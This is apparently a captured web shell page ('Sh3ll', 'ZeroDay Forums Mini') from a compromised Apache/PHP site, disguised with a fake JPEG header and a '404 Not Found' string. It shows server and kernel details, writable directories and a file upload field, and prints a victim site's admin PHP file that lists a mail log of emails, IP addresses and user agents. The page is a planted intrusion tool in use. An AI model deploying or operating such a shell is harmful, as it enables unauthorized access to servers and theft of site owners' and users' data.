����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/luckymerchan/code/admin/send_mail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/luckymerchan/code/admin/send_mail/list.php
<?php
$pageNum = isset($_GET['pageNum']) ? intval($_GET['pageNum']) : 1;
$pageSize = 20;
$from = (($pageNum * $pageSize) - $pageSize);
$t = $DB->fetch_row($DB->query("SELECT count(*) as total FROM tb_mail_log"));
$total = $t['total'];
$totalPage = ceil($total / $pageSize);
$txt_list = '';
$q_open = $DB->query("SELECT * FROM tb_mail_log ORDER BY mail_log_id DESC LIMIT $from, $pageSize");
while($r_open = $DB->fetch_row($q_open)){
    $arr_body = json_decode($r_open['mail_log_content'],true);
    $txt_list .= '<tr><td>'.$arr_body['email'].'</td><td>'.date('d-m-Y H:i',$arr_body['time']).'</td><td>'.$arr_body['ip'].'</td><td>'.$arr_body['agent'].'</td><td>Xóa</td></tr>';
}
$nav = $print->Pagination($totalPage,$pageNum,'pages','?act=admin&code=send_mail');
?>

ZeroDay Forums Mini